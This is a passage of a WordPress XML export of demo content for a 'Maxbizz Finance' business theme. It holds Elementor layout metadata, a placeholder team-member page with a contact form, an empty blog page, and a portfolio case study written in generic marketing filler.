:"background_repeat";i:2;s:15:"background_size";i:2;s:21:"background_background";i:2;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:8;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:8;s:11:"member_name";i:7;s:12:"member_extra";i:6;s:12:"social_share";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:10:"info_style";a:5:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;s:25:"job_typography_typography";i:8;s:24:"job_typography_font_size";i:8;s:28:"title_typography_font_weight";i:8;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:2:{s:8:"bg_color";i:3;s:10:"lbar_color";i:3;}s:18:"style_text_section";a:4:{s:11:"title_color";i:3;s:6:"per_bg";i:3;s:27:"title_typography_typography";i:3;s:28:"title_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:11:"style_tinfo";a:2:{s:26:"name_typography_typography";i:1;s:27:"name_typography_font_weight";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/single-team/</link>
		<pubDate>Thu, 10 Sep 2020 02:50:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=711</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="530" height="500" src="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg 530w, https://maxbizz.s3.amazonaws.com/images/image1-single-team-1-300x283.jpg 300w" sizes="(max-width: 530px) 100vw, 530px" />											
			<h3>Peter Perish</h3>		
			<h6>chief business project</h6>		
		<ul><li>Department: Business Department</li><li>Experience: 15 Years</li><li>Email: perish.maxbizz@mail.com</li><li>Phone: +1-800-456-478-23</li><li>Fax: +1-800-456-478-24</li></ul>		
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
			<h5>My Biography</h5>		
		<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app a mobile app development company has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>My Soft & Hard Skills</h5>		
		<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f736-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="736" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f736-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Contact Me</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send a message</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>711</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 02:50:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 02:50:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"b501399","elType":"section","settings":{"gap":"extended","padding":{"unit":"px","top":"90","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6365e43","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4b4c82c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","content_position":"middle","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[{"id":"fcac4d4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"98f528e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-single-team.jpg","id":713},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"1070f44","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"30","bottom":"30","left":"30","isLinked":false}},"elements":[{"id":"bfb6219","elType":"widget","settings":{"title":"Peter Perish","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"77b067d","elType":"widget","settings":{"title":"chief business project","header_size":"h6","title_color":"#52C5B6","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e4d0805","elType":"widget","settings":{"editor":"<ul class=\"member-info\"><li><span class=\"text-dark\">Department:<\/span> Business Department<\/li><li><span class=\"text-dark\">Experience:<\/span> 15 Years<\/li><li><span class=\"text-dark\">Email: <\/span>perish.maxbizz@mail.com<\/li><li><span class=\"text-dark\">Phone: <\/span>+1-800-456-478-23<\/li><li><span class=\"text-dark\">Fax: <\/span>+1-800-456-478-24<\/li><\/ul>"},"elements":[],"widgetType":"text-editor"},{"id":"1453173","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4","align":"left"},"elements":[],"widgetType":"social-icons"}],"isInner":true}],"isInner":true},{"id":"a742530","elType":"widget","settings":{"title":"My Biography","header_size":"h5","_padding":{"unit":"px","top":"60","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"40","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ef6bdc8","elType":"widget","settings":{"editor":"<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app <span style=\"color: #52c5b6;\">a mobile app development company<\/span> has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"984c88f","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"865ab3e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7bbffe7","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"da47a10","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a81434a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1541169","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ca57b45","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c75fefb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bdf3219","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"17353e6","elType":"widget","settings":{"title":"My Soft & Hard Skills","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"318c138","elType":"widget","settings":{"editor":"<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2b3ff2b","elType":"widget","settings":{"cf7":"736","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"30","right":"20","bottom":"30","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:7;s:19:"_inline_size_tablet";i:6;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"heading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:4;s:11:"header_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:2;s:3:"gap";i:3;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:3;s:7:"padding";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:2;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:3:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:28:"title_typography_font_family";i:4;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=768</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>768</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[770]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consultation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/</link>
		<pubDate>Fri, 11 Sep 2020 07:26:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=773</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
